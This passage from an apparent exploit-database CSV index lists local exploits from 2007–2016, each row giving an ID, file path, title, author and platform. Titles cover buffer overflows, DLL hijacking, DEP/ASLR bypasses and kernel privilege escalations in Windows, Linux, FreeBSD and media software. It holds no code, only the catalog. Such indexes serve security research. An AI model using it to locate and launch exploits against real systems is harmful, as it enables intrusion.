Processing Buffer Overflow",2010-05-06,"Lufeng Li & Qingshan Li",windows,local, -12528,exploits/windows/local/12528.pl,"AVCON H323Call - Local Buffer Overflow",2010-05-07,"Dillon Beresford",windows,local, -12540,exploits/windows/local/12540.rb,"IDEAL Migration 4.5.1 - Local Buffer Overflow (Metasploit)",2010-05-08,blake,windows,local, -12621,exploits/windows/local/12621.pl,"Shellzip 3.0 Beta 3 - '.zip' Local Stack Buffer Overflow (PoC)",2010-05-16,sud0,windows,local, -12662,exploits/windows/local/12662.rb,"SyncBack Freeware 3.2.20.0 - Local Overflow (SEH)",2010-05-19,Lincoln,windows,local, -30093,exploits/linux/local/30093.txt,"Mutt 1.4.2 - Mutt_Gecos_Name Function Local Buffer Overflow",2007-05-28,raylai,linux,local, -12677,exploits/windows/local/12677.html,"Rumba FTP Client 'FTPSFtp.dll' 4.2.0.0 - 'OpenSession()' Local Buffer Overflow",2010-05-21,sinn3r,windows,local, -12710,exploits/windows/local/12710.c,"Kingsoft Webshield 'KAVSafe.sys' 2010.4.14.609 (2010.5.23) - Kernel Mode Privilege Escalation",2010-05-23,"Xuanyuan Smart",windows,local, -12803,exploits/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function 'Initialize()' Local Buffer Overflow",2010-05-30,sinn3r,windows,local, -12821,exploits/windows/local/12821.py,"Mediacoder 0.7.3.4672 - Local Overflow (SEH)",2010-05-31,Stoke,windows,local, -40335,exploits/windows/local/40335.txt,"ArcServe UDP 6.0.3792 Update 2 Build 516 - Unquoted Service Path Privilege Escalation",2016-09-05,sh4d0wman,windows,local, -15499,exploits/windows/local/15499.py,"Free WMA MP3 Converter 1.1 - Local Buffer Overflow (SEH)",2010-11-12,Dr_IDE,windows,local, -13756,exploits/windows/local/13756.py,"VUPlayer 2.49 - '.m3u' File Universal Buffer Overflow (DEP Bypass) (1)",2010-06-07,mr_me,windows,local, -13760,exploits/windows/local/13760.py,"Audio Converter 8.1 - Local Stack Buffer Overflow (PoC)",2010-06-07,sud0,windows,local, -13761,exploits/windows/local/13761.pl,"Easy CD-DA Recorder 2007 - Local Buffer Overflow (SEH)",2010-06-07,chap0,windows,local, -13763,exploits/windows/local/13763.pl,"Audio Converter 8.1 - Local Stack Buffer Overflow (PoC) ROP/WPM",2010-06-07,sud0,windows,local, -13767,exploits/windows/local/13767.c,"SureThing CD Labeler - '.m3u/.pls' Unicode Stack Overflow (PoC)",2010-06-08,mr_me,windows,local, -13768,exploits/php/local/13768.py,"Castripper 2.50.70 - '.pls' File Stack Buffer Overflow (DEP Bypass)",2010-06-08,mr_me,php,local, -13806,exploits/windows/local/13806.txt,"ActivePerl 5.8.8.817 - Local Buffer Overflow",2010-06-09,PoisonCode,windows,local, -13820,exploits/windows/local/13820.pl,"Power Tab Editor 1.7 (Build 80) - Local Buffer Overflow",2010-06-11,sud0,windows,local, -13895,exploits/windows/local/13895.py,"Rosoft Audio Converter 4.4.4 - Local Buffer Overflow",2010-06-16,blake,windows,local, -13905,exploits/windows/local/13905.py,"BlazeDVD 5.1 (Windows 7) - '.plf' File Stack Buffer Overflow (PoC) (ASLR + DEP Bypass)",2010-06-17,mr_me,windows,local, -13907,exploits/windows/local/13907.py,"Winamp 5.572 - Local Buffer Overflow (EIP + SEH) (DEP Bypass)",2010-06-17,TecR0c,windows,local, -13909,exploits/windows/local/13909.py,"Batch Audio Converter Lite Edition 1.0.0.0 - Local Stack Buffer Overflow (SEH)",2010-06-17,modpr0be,windows,local, -13940,exploits/windows/local/13940.pl,"Orbital Viewer 1.04 - '.ov' Local Universal Stack Overflow (SEH)",2010-06-19,Crazy_Hacker,windows,local, -13942,exploits/windows/local/13942.pl,"MoreAmp - '.maf' Local Stack Buffer Overflow (SEH)",2010-06-20,Madjix,windows,local, -13998,exploits/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' File Universal Buffer Overflow (SEH)",2010-06-23,Madjix,windows,local, -14002,exploits/freebsd/local/14002.c,"FreeBSD 8.0/7.3/7.2 - 'nfs_mount()' Local Privilege Escalation",2010-06-23,"Patroklos Argyroudis",freebsd,local, -14029,exploits/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local, -14044,exploits/windows/local/14044.pl,"WM Downloader 2.9.2 - Local Stack Buffer Overflow",2010-06-25,Madjix,windows,local, -14046,exploits/windows/local/14046.py,"FieldNotes 32 5.0 - Local Buffer Overflow (SEH)",2010-06-25,TecR0c,windows,local, -14068,exploits/windows/local/14068.py,"Winamp 5.572 (Windows 7) - Local Buffer Overflow (ASLR + DEP Bypass)",2010-06-26,Node,windows,local, -14077,exploits/windows/local/14077.rb,"BlazeDVD 6.0 - Local Buffer Overflow (Metasploit)",2010-06-27,blake,windows,local, -14081,exploits/windows/local/14081.pl,"RM Downloader 3.1.3 - Local Buffer Overflow (SEH)",2010-06-27,Madjix,windows,local, -14098,exploits/windows/local/14098.py,"GSM SIM Utility 5.15 - '.sms' File Local Buffer Overflow (SEH)",2010-06-28,chap0,windows,local, -14150,exploits/windows/local/14150.pl,"RM Downloader 3.1.3 (Windows 7) - Local ASLR + DEP Bypass (SEH)",2010-07-01,Node,windows,local, -14153,exploits/windows/local/14153.pl,"Mediacoder 0.7.3.4682 - Universal Buffer Overflow (SEH)",2010-07-01,Madjix,windows,local, -14191,exploits/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local, -14215,exploits/windows/local/14215.txt,"SasCam 2.7 - ActiveX Head Buffer Overflow",2010-07-05,blake,windows,local, -14256,exploits/windows/local/14256.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovwebsnmpsrv.exe' Local Buffer Overflow (SEH)",2010-07-07,bitform,windows,local, -14258,exploits/windows/local/14258.py,"GSM SIM Utility 5.15 - Direct RET Overflow",2010-07-07,chap0,windows,local, -14339,exploits/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,linux,local, -14352,exploits/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - Multiple OS ASLR + DEP Bypass (SEH) (Metasploit)",2010-07-13,Node,windows,local, -14361,exploits/windows/local/14361.py,"Microsoft Excel - 0x5D record Stack Overflow (MS10-038)",2010-07-14,webDEViL,windows,local, -14373,exploits/win_x86/local/14373.pl,"Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Local Stack Buffer Overflow Universal",2010-07-16,Madjix,win_x86,local, -14397,exploits/windows/local/14397.rb,"MoreAmp - Local Buffer Overflow (SEH) (Metasploit)",2010-07-17,Madjix,windows,local, -14403,exploits/windows/local/14403.txt,"Microsoft Windows - Automatic .LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local, -14406,exploits/bsd/local/14406.pl,"Ghostscript - '.PostScript' File Stack Overflow",2010-07-18,"Rodrigo Rubira Branco",bsd,local, -14428,exploits/windows/local/14428.py,"QQPlayer - '.asx' File Processing Buffer Overflow",2010-07-21,"Li Qingshan",windows,local, -14431,exploits/windows/local/14431.py,"QQPlayer - '.cue' File Buffer Overflow",2010-07-21,"Lufeng Li",windows,local, -14433,exploits/windows/local/14433.pl,"ZipCentral - '.zip' Local Buffer Overflow (SEH)",2010-07-21,"Jiten Pathy",windows,local, -14464,exploits/windows/local/14464.pl,"Mediacoder 0.7.3.4682 - '.m3u' Universal Buffer Overflow",2010-07-24,s-dz,windows,local, -14482,exploits/windows/local/14482.py,"QQPlayer 2.3.696.400p1 - '.smi' File Buffer Overflow",2010-07-27,"Lufeng Li",windows,local, -14491,exploits/windows/local/14491.txt,"Zemana AntiLogger 'AntiLog32.sys' 1.5.2.755 - Local Privilege Escalation",2010-07-28,th_decoder,windows,local, -14497,exploits/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Local Buffer Overflow (SEH)",2010-07-28,fdiskyou,windows,local, -14503,exploits/windows/local/14503.pl,"HTML Email Creator 2.42 build 718 - Local Buffer Overflow (SEH)",2010-07-29,Madjix,windows,local, -14527,exploits/windows/local/14527.pl,"WM Downloader 3.1.2.2 - Local Buffer Overflow (1)",2010-08-02,s-dz,windows,local, -14532,exploits/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Cnvrtr - Local Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",windows,local, -14538,exploits/ios/local/14538.txt,"Apple iOS - '.pdf' Jailbreak",2010-08-03,jailbreakme,ios,local, -14550,exploits/windows/local/14550.py,"Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram' Local Overflow",2010-08-04,"Oh Yaw Theng",windows,local, -14566,exploits/windows/local/14566.c,"Microsoft Windows - 'win32k.sys' Driver 'CreateDIBPalette()' Local Buffer Overflow",2010-08-06,Arkon,windows,local, -14576,exploits/windows/local/14576.c,"Mini-stream Ripper 3.1.2.1 - Local Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",windows,local, -14581,exploits/windows/local/14581.py,"myMP3-Player 3.0 - Local Buffer Overflow",2010-08-08,"Oh Yaw Theng",windows,local, -14591,exploits/windows/local/14591.py,"Fat Player 0.6b - '.WAV' File Processing Buffer Overflow (SEH)",2010-08-09,"Praveen Darshanam",windows,local, -14610,exploits/windows/local/14610.txt,"Microsoft Windows - Tracing Registry Key ACL Privilege Escalation",2010-08-10,"Cesar Cerrudo",windows,local, -14612,exploits/windows/local/14612.py,"Mediacoder 0.7.5.4710 - Local Buffer Overflow",2010-08-11,anonymous,windows,local, -14630,exploits/windows/local/14630.py,"Mediacoder 0.7.5.4710 - 'Universal' Local Buffer Overflow (SEH)",2010-08-12,Dr_IDE,windows,local, -14633,exploits/windows/local/14633.py,"Xion Player 1.0.125 - Local Stack Buffer Overflow",2010-08-13,corelanc0d3r,windows,local, -14676,exploits/windows/local/14676.pl,"A-PDF WAV to MP3 Converter 1.0.0 - '.m3u' Local Stack Buffer Overflow",2010-08-17,d4rk-h4ck3r,windows,local, -14651,exploits/windows/local/14651.py,"Rosoft Media Player 4.4.4 - Local Buffer Overflow (SEH) (2)",2010-08-15,dijital1,windows,local, -14663,exploits/windows/local/14663.py,"MUSE 4.9.0.006 - '.m3u' Local Buffer Overflow",2010-08-16,"Glafkos Charalambous",windows,local, -14664,exploits/windows/local/14664.py,"MUSE 4.9.0.006 - '.pls' Universal Local Buffer Overflow (SEH)",2010-08-16,"Glafkos Charalambous",windows,local, -14673,exploits/windows/local/14673.py,"Triologic Media Player 8 - '.m3u' Universal Unicode Local Buffer Overflow (SEH)",2010-08-17,"Glafkos Charalambous",windows,local, -14681,exploits/windows/local/14681.py,"A-PDF WAV to MP3 1.0.0 - Universal Local (SEH)",2010-08-18,Dr_IDE,windows,local, -14688,exploits/freebsd/local/14688.c,"FreeBSD - 'mbufs()' sendfile Cache Poisoning Privilege Escalation",2010-08-19,kingcope,freebsd,local, -14693,exploits/windows/local/14693.py,"Microsoft Word - Record Parsing Buffer Overflow (MS09-027)",2010-08-20,anonymous,windows,local, -14706,exploits/windows/local/14706.py,"Microsoft Excel - FEATHEADER Record (MS09-067)",2010-08-21,anonymous,windows,local, -14720,exploits/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Local Buffer Overflow",2010-08-23,"James Fitts",windows,local, -14721,exploits/windows/local/14721.c,"Wireshark 1.2.10 - 'airpcap.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local, -14723,exploits/windows/local/14723.c,"Microsoft PowerPoint 2010 - 'pptimpconv.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local, -14727,exploits/hardware/local/14727.py,"Foxit Reader 4.0 - '.pdf' Jailbreak",2010-08-24,"Jose Miguel Esparza",hardware,local, -14726,exploits/windows/local/14726.c,"uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local, -14728,exploits/windows/local/14728.c,"Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",windows,local, -14730,exploits/windows/local/14730.c,"Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous",windows,local, -14731,exploits/windows/local/14731.c,"Microsoft Windows Movie Maker 2.6.4038.0 - 'hhctrl.ocx' DLL Hijacking",2010-08-24,TheLeader,windows,local, -14732,exploits/windows/local/14732.c,"Opera 10.61 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",windows,local, -14733,exploits/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll wab.exe' DLL Hijacking",2010-08-24,TheLeader,windows,local, -14734,exploits/windows/local/14734.c,"TeamViewer 5.0.8703 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous",windows,local, -14735,exploits/windows/local/14735.c,"Adobe Dreamweaver CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous",windows,local, -14744,exploits/windows/local/14744.c,"Microsoft Visio 2003 - 'mfc71enu.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local, -14745,exploits/windows/local/14745.c,"Microsoft Address Book 6.00.2900.5512 - 'wab32res.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local, -14746,exploits/windows/local/14746.c,"Microsoft Office Groove 2007 - 'mso.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local, -14747,exploits/windows/local/14747.c,"TeamMate Audit Management Software Suite - 'mfc71enu.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local, -14739,exploits/windows/local/14739.c,"BS.Player 2.56 build 1043 - 'mfc71loc.dll' DLL Hijacking",2010-08-25,diwr,windows,local, -14740,exploits/windows/local/14740.c,"Adobe Dreamweaver CS5 11.0 build 4909 - 'mfc90loc.dll' DLL Hijacking",2010-08-25,diwr,windows,local, -14741,exploits/windows/local/14741.c,"Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking",2010-08-25,storm,windows,local, -14743,exploits/windows/local/14743.c,"Avast! 5.0.594 - 'mfc90loc.dll' License Files DLL Hijacking",2010-08-25,diwr,windows,local, -14748,exploits/windows/local/14748.txt,"uTorrent 2.0.3 - DLL Hijacking",2010-08-25,Dr_IDE,windows,local, -14750,exploits/windows/local/14750.txt,"VideoLAN VLC Media Player 1.1.3 - 'wintab32.dll' DLL Hijacking",2010-08-25,Secfence,windows,local, -14751,exploits/windows/local/14751.txt,"Microsoft Vista - 'fveapi.dll' BitLocker Drive Encryption API Hijacking",2010-08-25,"Beenu Arora",windows,local, -14752,exploits/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local, -14756,exploits/windows/local/14756.c,"Apple Safari 5.0.1 - 'dwmapi.dll' DLL Hijacking",2010-08-25,Secfence,windows,local, -14753,exploits/windows/local/14753.c,"InterVideo WinDVD 5 - 'cpqdvd.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local, -14754,exploits/windows/local/14754.txt,"Microsoft Internet Connection Signup Wizard - 'smmscrpt.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local, -14755,exploits/windows/local/14755.c,"Adobe Device Central CS5 - 'qtcf.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous",windows,local, -14762,exploits/windows/local/14762.c,"Ettercap NG-0.7.3 - 'wpcap.dll' DLL Hijacking",2010-08-25,anonymous,windows,local, -14758,exploits/windows/local/14758.c,"Microsoft Group Convertor - 'imm.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local, -14764,exploits/windows/local/14764.c,"TechSmith Snagit 10 (Build 788) - 'dwmapi.dll' DLL Hijacking",2010-08-25,Encrypt3d.M!nd,windows,local, -14765,exploits/windows/local/14765.c,"Media Player Classic 1.3.2189.0 - 'iacenc.dll' DLL Hijacking",2010-08-25,Encrypt3d.M!nd,windows,local, -14766,exploits/windows/local/14766.c,"Skype 4.2.0.169 - 'wab32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous",windows,local, -14768,exploits/windows/local/14768.c,"Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,windows,local, -14769,exploits/windows/local/14769.c,"Nvidia Driver - 'nview.dll' DLL Hijacking",2010-08-25,Encrypt3d.M!nd,windows,local, -14771,exploits/windows/local/14771.c,"Adobe Premier Pro CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous",windows,local, -14772,exploits/windows/local/14772.c,"Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous",windows,local, -14773,exploits/windows/local/14773.c,"Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous",windows,local, -14774,exploits/windows/local/14774.c,"Cisco Packet Tracer 5.2 - 'wintab32.dll' DLL Hijacking",2010-08-25,CCNA,windows,local, -14775,exploits/windows/local/14775.c,"Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous",windows,local, -14778,exploits/windows/local/14778.c,"Microsoft Windows - Contacts 'wab32res.dll' DLL Hijacking",2010-08-25,storm,windows,local, -14780,exploits/windows/local/14780.c,"Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking",2010-08-25,ALPdaemon,windows,local, -14781,exploits/windows/local/14781.c,"Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,windows,local, -14782,exploits/windows/local/14782.c,"Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking",2010-08-25,storm,windows,local, -14783,exploits/windows/local/14783.c,"Mozilla Thunderbird - 'dwmapi.dll' DLL Hijacking",2010-08-25,h4ck3r#47,windows,local, -14784,exploits/windows/local/14784.c,"Adobe Extension Manager CS5 5.0.298 - 'dwmapi.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local, -14785,exploits/windows/local/14785.c,"Adobe ExtendedScript Toolkit CS5 3.5.0.52 - 'dwmapi.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local, -14786,exploits/windows/local/14786.c,"CorelDRAW X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local, -14787,exploits/windows/local/14787.c,"Corel PHOTO-PAINT X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local, -14788,exploits/windows/local/14788.c,"Media Player Classic 6.4.9.1 - 'iacenc.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local, -14789,exploits/windows/local/14789.c,"NullSoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local, -14790,exploits/windows/local/14790.c,"Google Earth 5.1.3535.3218 - 'quserex.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local, -14791,exploits/windows/local/14791.c,"Daemon Tools Lite - 'mfc80loc.dll' DLL Hijacking",2010-08-25,"Mohamed Clay",windows,local, -14793,exploits/windows/local/14793.c,"Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking",2010-08-25,"xsploited security",windows,local, -14814,exploits/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalation",2010-08-27,"Jon Oberheide",linux,local, -14830,exploits/linux/local/14830.py,"Nginx 0.6.38 - Heap Corruption",2010-08-29,"Aaron Conole",linux,local, -14831,exploits/windows/local/14831.rb,"SnackAmp 3.1.2 - SMP Buffer Overflow (SEH)",2010-08-29,"James Fitts",windows,local, -14944,exploits/windows/local/14944.py,"Microsoft Visio 2002 - '.DXF' File Stack based Overflow",2010-09-08,Abysssec,windows,local, -14966,exploits/windows/local/14966.py,"Excel RTD - Memory Corruption",2010-09-10,Abysssec,windows,local, -14959,exploits/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended .M3U Directives (SEH)",2010-09-09,"Carlos Mario Penagos Hollmann",windows,local, -14961,exploits/win_x86/local/14961.py,"Audiotran 1.4.2.4 - Local Overflow (SEH)",2010-09-09,"Abhishek Lyall",win_x86,local, -14982,exploits/windows/local/14982.py,"Adobe Acrobat and Reader - 'pushstring' Memory Corruption",2010-09-12,Abysssec,windows,local, -15013,exploits/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - Local Overflow (SEH)",2010-09-15,"sanjeev gupta",windows,local, -15022,exploits/windows/local/15022.py,"Honestech VHS to DVD 3.0.30 Deluxe - Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local, -15023,exploits/lin_x86-64/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",lin_x86-64,local, -15024,exploits/lin_x86-64/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation",2010-09-16,Ac1dB1tCh3z,lin_x86-64,local, -15026,exploits/windows/local/15026.py,"BACnet OPC Client - Local Buffer Overflow (1)",2010-09-16,"Jeremy Brown",windows,local, -15031,exploits/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - Local Overflow (SEH)",2010-09-17,"Abhishek Lyall",windows,local, -15033,exploits/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local (SEH)",2010-09-17,modpr0be,windows,local, -15047,exploits/windows/local/15047.rb,"Audiotran 1.4.2.4 - Local Overflow (SEH) (DEP Bypass)",2010-09-19,"Muhamad Fadzil Ramli",windows,local, -15099,exploits/windows/local/15099.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow (SEH)",2010-09-24,"James Fitts",windows,local, -15069,exploits/windows/local/15069.py,"Acoustica Audio Converter Pro 1.1 (build 25) - Local Heap Overflow (.mp3 / .wav / .ogg / .wma) (PoC)",2010-09-21,"Carlos Mario Penagos Hollmann",windows,local, -15074,exploits/linux/local/15074.sh,"mountall 2.15.2 (Ubuntu 10.04/10.10) - Local Privilege Escalation",2010-09-21,fuzz,linux,local, -15081,exploits/windows/local/15081.rb,"MP3 Workstation 9.2.1.1.2 - Local Overflow (SEH) (Metasploit)",2010-09-22,Madjix,windows,local, -15094,exploits/windows/local/15094.py,"Microsoft Excel - OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local, -15133,exploits/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - Local Overflow (SEH)",2010-09-27,"sanjeev gupta",windows,local, -15134,exploits/windows/local/15134.rb,"Digital Music Pad 8.2.3.3.4 - Local Overflow (SEH) (Metasploit)",2010-09-27,"Abhishek Lyall",windows,local, -15150,exploits/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure (PoC)",2010-09-29,"Jon Oberheide",linux,local, -15155,exploits/linux/local/15155.c,"XFS - Deleted Inode Local Information Disclosure",2010-09-29,"Red Hat",linux,local, -15156,exploits/windows/local/15156.py,"Quick Player 1.3 - Unicode (SEH)",2010-09-29,"Abhishek Lyall",windows,local, -15184,exploits/windows/local/15184.c,"AudioTran 1.4.2.4 - SafeSEH + SEHOP",2010-10-02,x90c,windows,local, -15201,exploits/windows/local/15201.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow (SEH) (DEP Bypass)",2010-10-04,"Muhamad Fadzil Ramli",windows,local, -15206,exploits/bsd/local/15206.c,"FreeBSD - 'pseudofs' Null Pointer Dereference Privilege Escalation",2010-10-04,"Babcia Padlina",bsd,local, -15285,exploits/linux/local/15285.c,"Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local, -15599,exploits/windows/local/15599.py,"Xion Audio Player 1.0.127 - '.m3u' Local Buffer Overflow",2010-11-23,0v3r,windows,local, -15609,exploits/windows/local/15609.txt,"Microsoft Windows Vista/7 - Local Privilege Escalation (UAC Bypass)",2010-11-24,noobpwnftw,windows,local, -15274,exploits/linux/local/15274.txt,"GNU C library dynamic linker - '$ORIGIN' Expansion",2010-10-18,"Tavis Ormandy",linux,local, -15279,exploits/windows/local/15279.rb,"Fat Player 0.6b - '.wav' Local Buffer Overflow (SEH)",2010-10-18,"James Fitts",windows,local, -15287,exploits/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) - Local Stack Overflow",2010-10-19,Mighty-D,windows,local, -15304,exploits/linux/local/15304.txt,"GNU C Library 2.x (libc6) - Dynamic Linker LD_AUDIT Arbitrary DSO Load Privilege Escalation",2010-10-22,"Tavis Ormandy",linux,local, -15312,exploits/windows/local/15312.py,"Winamp 5.5.8.2985 (in_mod plugin) - Local Stack Overflow",2010-10-25,"Mighty-D & 7eK",windows,local, -15344,exploits/linux/local/15344.c,"Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite",2010-10-28,"Kees Cook",linux,local, -15376,exploits/windows/local/15376.c,"Trend Micro Titanium Maximum Security 2011 - Local Kernel",2010-11-01,"Nikita Tarakanov",windows,local, -15403,exploits/windows/local/15403.py,"MiniShare 1.4.0 < 1.5.5 - 'users.txt' Local Buffer Overflow",2010-11-02,"Chris Gabriel",windows,local, -15406,exploits/windows/local/15406.rb,"MiniShare 1.5.5 - Local Buffer Overflow (SEH)",2010-11-03,"Muhamad Fadzil Ramli",windows,local, -15417,exploits/windows/local/15417.pl,"GSPlayer 1.83a Win32 Release - Local Buffer Overflow",2010-11-04,moigai,windows,local, -15461,exploits/windows/local/15461.c,"G Data TotalCare 2011 - Local Kernel",2010-11-08,"Nikita Tarakanov",windows,local, -15475,exploits/multiple/local/15475.txt,"IBM OmniFind - Local Privilege Escalation",2010-11-09,"Fatih Kilic",multiple,local, -15480,exploits/windows/local/15480.pl,"Free CD to MP3 Converter 3.1 - Local Buffer Overflow",2010-11-10,"C4SS!0 G0M3S",windows,local, -15481,exploits/linux/local/15481.c,"Linux Kernel 2.4.0 - Stack Infoleaks",2010-11-10,"Dan Rosenberg",linux,local, -15483,exploits/windows/local/15483.rb,"Free CD to MP3 Converter 3.1 - Local Buffer Overflow (SEH)",2010-11-10,"C4SS!0 G0M3S",windows,local, -15489,exploits/windows/local/15489.py,"MP3-Nator 2.0 - Local Buffer Overflow (SEH)",2010-11-11,"C4SS!0 G0M3S",windows,local, -15532,exploits/windows/local/15532.py,"Foxit Reader 4.1.1 - Local Stack Buffer Overflow",2010-11-14,sud0,windows,local, -15539,exploits/windows/local/15539.pl,"Realtek Audio Control Panel 1.0.1.65 - Local Buffer Overflow",2010-11-14,BraniX,windows,local, -15540,exploits/windows/local/15540.pl,"Realtek Audio Microphone Calibration 1.1.1.6 - Local Buffer Overflow",2010-11-14,BraniX,windows,local, -15541,exploits/windows/local/15541.pl,"Realtek HD Audio Control Panel 2.1.3.2 - Local Buffer Overflow",2010-11-14,BraniX,windows,local, -15542,exploits/windows/local/15542.py,"Foxit Reader 4.1.1 - Local Stack Overflow (Egghunter)",2010-11-15,dookie,windows,local, -15566,exploits/windows/local/15566.rb,"DIZzy 1.12 - Local Stack Overflow",2010-11-18,g30rg3_x,windows,local, -15569,exploits/windows/local/15569.rb,"MP3-Nator - Local Buffer Overflow (SEH) (DEP Bypass)",2010-11-18,"Muhamad Fadzil Ramli",windows,local, -15575,exploits/windows/local/15575.py,"MiniShare 1.5.5 - 'users.txt' Local Buffer Overflow (Egghunter)",2010-11-19,0v3r,windows,local, -15584,exploits/windows/local/15584.txt,"Native Instruments Service Center 2.2.5 - Local Privilege Escalation",2010-11-20,LiquidWorm,windows,local, -15589,exploits/windows/local/15589.wsf,"Microsoft Windows - Task Scheduler Privilege Escalation",2010-11-20,webDEViL,windows,local, -15620,exploits/linux/local/15620.sh,"SystemTap - Local Privilege Escalation",2010-11-26,"Tavis Ormandy",linux,local, -15624,exploits/windows/local/15624.txt,"CA Internet Security Suite 2010 - 'KmxSbx.sys' Kernel Pool Overflow",2010-11-28,"Nikita Tarakanov",windows,local, -15626,exploits/windows/local/15626.py,"OtsTurntables 1.00.048 - '.m3u'/'.ofl' Local Buffer Overflow (SEH)",2010-11-28,0v3r,windows,local, -15630,exploits/windows/local/15630.py,"Mediacoder 0.7.5.4792 - Local Buffer Overflow (SEH)",2010-11-29,0v3r,windows,local, -15663,exploits/windows/local/15663.py,"Mediacoder 0.7.5.4797 - '.m3u' Local Buffer Overflow (SEH)",2010-12-02,"Oh Yaw Theng",windows,local, -15692,exploits/windows/local/15692.py,"Video Charge Studio 2.9.5.643 - '.vsc' Local Buffer Overflow (SEH)",2010-12-06,"xsploited security",windows,local, -15693,exploits/windows/local/15693.html,"Viscom VideoEdit Gold ActiveX 8.0 - Code Execution",2010-12-06,Rew,windows,local, -15696,exploits/windows/local/15696.txt,"Alice 2.2 - Arbitrary Code Execution",2010-12-06,Rew,windows,local, -15704,exploits/linux/local/15704.c,"Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local, -15706,exploits/windows/local/15706.txt,"Winamp 5.6 - 'MIDI Parser' Arbitrary Code Execution",2010-12-08,"Kryptos Logic",windows,local, -15745,exploits/linux/local/15745.txt,"IBM Tivoli Storage Manager (TSM) - Local Privilege Escalation",2010-12-15,"Kryptos Logic",linux,local, -15727,exploits/windows/local/15727.py,"FreeAmp 2.0.7 - '.m3u' Local Buffer Overflow",2010-12-11,zota,windows,local, -15729,exploits/windows/local/15729.py,"PowerShell XP 3.0.1 - Local Buffer Overflow",2010-12-12,m_101,windows,local, 